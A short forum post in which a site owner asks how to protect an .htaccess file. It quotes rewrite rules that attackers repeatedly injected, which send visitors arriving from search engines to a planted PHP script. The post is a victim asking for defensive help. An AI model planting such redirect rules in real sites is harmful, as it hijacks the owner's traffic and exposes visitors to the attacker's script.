How can we protect our htaccess file?
This code has appeared there several times now: (inserted by hackers)
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule . concernedly-conferrable.php [L,S=10000]
It redirects Google traffic away from our site. We changed all the passwords but after a few weeks the same problem again.
Many thanks